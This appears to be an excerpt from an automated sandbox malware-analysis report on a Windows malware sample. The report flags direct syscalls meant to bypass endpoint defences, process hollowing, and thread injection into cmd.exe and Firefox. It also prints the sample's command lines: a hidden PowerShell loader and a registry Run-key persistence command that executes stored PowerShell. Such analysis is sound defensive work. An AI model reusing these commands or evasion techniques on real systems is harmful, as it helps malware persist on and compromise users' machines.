        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470A5B mov eax, dword ptr fs:[00000030h]8_2_20470A5B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470A5B mov eax, dword ptr fs:[00000030h]8_2_20470A5B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049CA6F mov eax, dword ptr fs:[00000030h]8_2_2049CA6F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049CA6F mov eax, dword ptr fs:[00000030h]8_2_2049CA6F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049CA6F mov eax, dword ptr fs:[00000030h]8_2_2049CA6F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050EA60 mov eax, dword ptr fs:[00000030h]8_2_2050EA60
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DCA72 mov eax, dword ptr fs:[00000030h]8_2_204DCA72
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DCA72 mov eax, dword ptr fs:[00000030h]8_2_204DCA72
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204ECA11 mov eax, dword ptr fs:[00000030h]8_2_204ECA11
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048EA2E mov eax, dword ptr fs:[00000030h]8_2_2048EA2E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049CA24 mov eax, dword ptr fs:[00000030h]8_2_2049CA24
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049CA38 mov eax, dword ptr fs:[00000030h]8_2_2049CA38
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20484A35 mov eax, dword ptr fs:[00000030h]8_2_20484A35
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20484A35 mov eax, dword ptr fs:[00000030h]8_2_20484A35
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204B6ACC mov eax, dword ptr fs:[00000030h]8_2_204B6ACC
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204B6ACC mov eax, dword ptr fs:[00000030h]8_2_204B6ACC
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204B6ACC mov eax, dword ptr fs:[00000030h]8_2_204B6ACC
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460AD0 mov eax, dword ptr fs:[00000030h]8_2_20460AD0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20494AD0 mov eax, dword ptr fs:[00000030h]8_2_20494AD0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20494AD0 mov eax, dword ptr fs:[00000030h]8_2_20494AD0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049AAEE mov eax, dword ptr fs:[00000030h]8_2_2049AAEE
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049AAEE mov eax, dword ptr fs:[00000030h]8_2_2049AAEE
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]8_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]8_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]8_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]8_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]8_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]8_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]8_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]8_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA80 mov eax, dword ptr fs:[00000030h]8_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534A80 mov eax, dword ptr fs:[00000030h]8_2_20534A80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20498A90 mov edx, dword ptr fs:[00000030h]8_2_20498A90
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468AA0 mov eax, dword ptr fs:[00000030h]8_2_20468AA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468AA0 mov eax, dword ptr fs:[00000030h]8_2_20468AA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204B6AA4 mov eax, dword ptr fs:[00000030h]8_2_204B6AA4
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050EB50 mov eax, dword ptr fs:[00000030h]8_2_2050EB50
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h]8_2_20532B57
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h]8_2_20532B57
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h]8_2_20532B57
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20532B57 mov eax, dword ptr fs:[00000030h]8_2_20532B57
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F6B40 mov eax, dword ptr fs:[00000030h]8_2_204F6B40
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F6B40 mov eax, dword ptr fs:[00000030h]8_2_204F6B40
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052AB40 mov eax, dword ptr fs:[00000030h]8_2_2052AB40
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20508B42 mov eax, dword ptr fs:[00000030h]8_2_20508B42
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20458B50 mov eax, dword ptr fs:[00000030h]8_2_20458B50
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20514B4B mov eax, dword ptr fs:[00000030h]8_2_20514B4B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20514B4B mov eax, dword ptr fs:[00000030h]8_2_20514B4B
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045CB7E mov eax, dword ptr fs:[00000030h]8_2_2045CB7E
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]8_2_204DEB1D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]8_2_204DEB1D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]8_2_204DEB1D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]8_2_204DEB1D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]8_2_204DEB1D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]8_2_204DEB1D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]8_2_204DEB1D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]8_2_204DEB1D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204DEB1D mov eax, dword ptr fs:[00000030h]8_2_204DEB1D
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20534B00 mov eax, dword ptr fs:[00000030h]8_2_20534B00
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048EB20 mov eax, dword ptr fs:[00000030h]8_2_2048EB20
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048EB20 mov eax, dword ptr fs:[00000030h]8_2_2048EB20
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20528B28 mov eax, dword ptr fs:[00000030h]8_2_20528B28
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20528B28 mov eax, dword ptr fs:[00000030h]8_2_20528B28
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050EBD0 mov eax, dword ptr fs:[00000030h]8_2_2050EBD0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20480BCB mov eax, dword ptr fs:[00000030h]8_2_20480BCB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20480BCB mov eax, dword ptr fs:[00000030h]8_2_20480BCB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20480BCB mov eax, dword ptr fs:[00000030h]8_2_20480BCB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460BCD mov eax, dword ptr fs:[00000030h]8_2_20460BCD
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460BCD mov eax, dword ptr fs:[00000030h]8_2_20460BCD
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460BCD mov eax, dword ptr fs:[00000030h]8_2_20460BCD
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048EBFC mov eax, dword ptr fs:[00000030h]8_2_2048EBFC
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468BF0 mov eax, dword ptr fs:[00000030h]8_2_20468BF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468BF0 mov eax, dword ptr fs:[00000030h]8_2_20468BF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20468BF0 mov eax, dword ptr fs:[00000030h]8_2_20468BF0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204ECBF0 mov eax, dword ptr fs:[00000030h]8_2_204ECBF0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtClose: Direct from: 0x77672B6C
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 2180Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\cmd.exeThread APC queued: target process: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeJump to behavior
        Sample uses process hollowing technique
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Overfondle.exe base address: 400000Jump to behavior
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Overfondle.exe base: 1660000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Overfondle.exe base: 19FFF4Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Overfondle.exe "C:\Users\user\AppData\Local\Temp\Overfondle.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"Jump to behavior
        Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "hakkebrttet" /t reg_expand_sz /d "%elaf% -windowstyle minimized $ultramicrotome=(get-itemproperty -path 'hkcu:\noncoherent\').skvadredes;%elaf% ($ultramicrotome)"
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "hakkebrttet" /t reg_expand_sz /d "%elaf% -windowstyle minimized $ultramicrotome=(get-itemproperty -path 'hkcu:\noncoherent\').skvadredes;%elaf% ($ultramicrotome)"Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_6EAC1096 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,lstrcmpiA,lstrcmpiA,DeleteFileA,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,RpcServerRegisterIf3,CreateProcessA,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalFree,GetTickCount,WaitForSingleObject,GetExitCodeProcess,RpcServerRegisterIf3,PeekNamedPipe,GetTickCount,ReadFile,lstrcpyA,GlobalReAlloc,lstrcpyA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,0_2_6EAC1096
        Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
        Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
